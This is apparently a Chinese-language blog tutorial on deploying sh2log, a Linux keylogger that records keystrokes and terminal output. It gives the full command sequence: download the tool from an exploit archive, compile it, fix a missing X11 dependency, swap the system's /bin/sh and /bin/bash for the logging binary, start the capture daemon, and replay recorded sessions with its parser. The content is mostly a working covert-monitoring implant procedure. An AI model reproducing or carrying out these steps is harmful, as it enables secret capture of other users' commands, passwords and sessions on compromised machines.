[sh2log]Linux键盘记录 keylogger notes

不仅可以记录到击键信息，而且包括终端下的输出信息

[root@Centos log]# wget http://www.i0day.com/exp/Linux/sh2log-1.0.tgz--2013-01-07 05:16:56-- http://www.i0day.com/exp/Linux/sh2log-1.0.tgzResolving packetstorm.foofus.com... 64.71.188.242Connecting to packetstorm.foofus.com|64.71.188.242|:80... connected.HTTP request sent, awaiting response... 200 OKLength: 80240 (78K)Saving to: `sh2log-1.0.tgz'100%[=====================================================================================>] 80,240 57.2K/s in 1.4s2013-01-07 05:16:58 (57.2 KB/s) - `sh2log-1.0.tgz' saved [80240/80240][root@Centos log]# tar xf sh2log-1.0.tgz[root@Centos log]# cd sh2log-1.0[root@Centos sh2log-1.0]#

编译选项

[root@Centos sh2log-1.0]# makePlease specify the target:make linuxmake freebsdmake openbsdmake cygwinmake sunosmake irixmake hpuxmake aixmake osf

如下:

[root@Centos sh2log-1.0]# make linuxgcc -g -W -Wall -o sh2log rc4.c sha1.c sh2log.c -lutil -DLINUXgcc -g -W -Wall -o sh2logd rc4.c sha1.c sh2logd.cgcc -g -W -Wall -o parser rc4.c sha1.c parser.c -lX11 -L/usr/X11R6/libparser.c:35:22: error: X11/Xlib.h: No such file or directoryparser.c: In function ‘main’:parser.c:291: error: ‘Display’ undeclared (first use in this function)parser.c:291: error: (Each undeclared identifier is reported only onceparser.c:291: error: for each function it appears in.)parser.c:291: error: ‘dpi’ undeclared (first use in this function)parser.c:292: error: ‘Window’ undeclared (first use in this function)parser.c:292: error: expected ‘;’ before ‘wnd’parser.c:293: error: ‘XWindowAttributes’ undeclared (first use in this function)parser.c:293: error: expected ‘;’ before ‘xwa’parser.c:515: warning: implicit declaration of function ‘XOpenDisplay’parser.c:522: error: ‘wnd’ undeclared (first use in this function)parser.c:524: warning: implicit declaration of function ‘XSetWindowBorderWidth’parser.c:525: warning: implicit declaration of function ‘XSync’parser.c:525: error: ‘False’ undeclared (first use in this function)parser.c:526: warning: implicit declaration of function ‘XGetWindowAttributes’parser.c:526: error: ‘xwa’ undeclared (first use in this function)parser.c:714: warning: implicit declaration of function ‘XMoveResizeWindow’parser.c:772: warning: implicit declaration of function ‘XCloseDisplay’make: *** [linux] Error 1

错误：

parser.c:35:22: error: X11/Xlib.h: No such file or directory

安装X11

[root@Centos sh2log-1.0]# yum install libX11-devel

再编译:

[root@Centos sh2log-1.0]# make linuxgcc -g -W -Wall -o sh2log rc4.c sha1.c sh2log.c -lutil -DLINUXgcc -g -W -Wall -o sh2logd rc4.c sha1.c sh2logd.cgcc -g -W -Wall -o parser rc4.c sha1.c parser.c -lX11 -L/usr/X11R6/lib

先删除演示：

[root@Centos sh2log-1.0]# rm test.bin

配置：

[root@Centos sh2log-1.0]# mkdir /bin/shells/[root@Centos sh2log-1.0]# cp -p /bin/sh /bin/shells/[root@Centos sh2log-1.0]# cp -p /bin/bash /bin/shells/[root@Centos sh2log-1.0]# rm -rf /bin/sh /bin/bash[root@Centos sh2log-1.0]# cp -p sh2log /bin/sh[root@Centos sh2log-1.0]# cp -p sh2log /bin/bash[root@Centos sh2log-1.0]# ./sh2logd[root@Centos sh2log-1.0]# ps -ef | grep sh2logdroot 27151 1 0 05:24 ? 00:00:00 ./sh2logdroot 27175 26396 0 05:24 pts/3 00:00:00 grep sh2logd[root@Centos sh2log-1.0]#

发现sh2logd 已经启动了 当前目录下生成了以时间命名的BIN文件

-rw------- 1 root root 0 Jan 7 05:24 sh2log-20130107-052402.bin

查看记录

先打开个终端操作以下：

[root@Centos log]# bash[root@Centos log]# ls -latotal 112drwxr-xr-x 3 root root 4096 Jan 7 05:17 .drwxrwxrwt 17 root root 4096 Jan 7 05:18 ..drwxr-xr-x 2 root root 4096 Jan 7 05:24 sh2log-1.0-rw-r--r-- 1 root root 80240 Nov 8 2006 sh2log-1.0.tgz[root@Centos log]# pwd/tmp/log[root@Centos log]#

查看日志：

[root@Centos sh2log-1.0]# ./parser sh2log-20130107-052402.binSID SOURCE IP UID PID START DATE END DATE DURATION1 [127.0.0.1] 0 (27293) 07/01 05:25 | 07/01 05:25 X 03s2 [127.0.0.1] 0 (27407) 07/01 05:26 | 07/01 05:26 X 02sIn interactive mode, use Enter to fast forward, Space to pause and q to quit.Note that xterm is required for window resizing.Session ID -> 2Interactive mode (y/n) ? n07/01 05:26:53 -> ls -la07/01 05:26:53 -> pwd